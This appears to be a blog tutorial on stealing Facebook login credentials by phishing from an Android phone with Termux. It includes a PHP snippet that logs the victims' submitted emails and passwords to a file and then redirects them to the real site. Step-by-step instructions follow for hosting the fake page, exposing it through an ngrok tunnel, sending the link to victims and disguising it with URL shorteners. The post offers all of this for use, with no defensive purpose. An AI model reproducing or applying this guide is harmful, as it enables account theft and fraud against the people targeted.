1. Termux application in Android phone
The below code will fetch the values from the login form and create a usernames.txt file into the htdocs folder. In this file, you will see the victim’s username and password.
<?phpfile_put_contents(“usernames.txt”, “Account: ” . $_POST[’email’] . ” Pass: ” . $_POST[‘pass’] . “n”, FILE_APPEND);header(‘Location: https://www.facebook.com’);exit();?>
Steps for Phishing Attack :
Step-1: Download the files from here ➡️ Facebook Account using Phishing Attack.
Step-2: Extract the files and put it into the htdocs folder
Step-3: Run the Kick web server. Make sure your kick web server in On condition during this process otherwise it will not open the phishing page.
Step-4: Open the termux application and type ./ngrok HTTP 8080 and you will get this screen like this. Basically, Ngrok will create a secure tunnel between you and the victim.
As you can see in the upper image there are 2 links provided by Ngrok Http & Https. You can Send one of the links to the victim. Ahh! this URL looks fake we can do one thing. To increase the success rate we can use URL shortener websites.
For Example Google URL Shortener, Bitly
Read Also: Basic Linux commands list with example and syntax for Beginners
Here in this post, I have created my own Android web server but you can also purchase free domain names from other free hosting service providers.
You can put those files into their servers. To do that you can read this post also
Get free hosting to do Phishing Attack.
Please let me recognize if you found this post helpful or not, leave a comment below to let me recognize another space you’d have an interest in reading posts regarding.
Subscribe my Newsfeed to get the latest post updates.